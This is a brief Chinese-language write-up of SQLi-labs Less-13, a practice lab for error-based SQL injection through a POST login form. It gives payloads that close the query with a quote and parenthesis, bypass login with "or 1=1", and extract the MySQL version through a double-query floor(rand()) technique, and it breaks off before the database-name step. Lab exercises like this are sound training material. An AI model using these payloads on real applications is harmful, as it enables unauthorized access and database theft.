Less-13 POST -Double Injection -Single quotes -String - with twist
0x01
You
have an error in your SQL syntax; check the manual that corresponds to
your MySQL server version for the right syntax to use near '1') LIMIT
0,1' at line 1
根据报错语句,可以用’) 闭合
uname=’) or 1=1#
0x02.获取数据库版本
uname= ') union select count(*),concat(0x3a,0x3a,(select version()),0x3a,0x3a,floor(rand()*2))as a from information_schema.tables group by a # &passwd= ') or 1=1 # &submit=Submit
0x03.获取数据库名称
uname=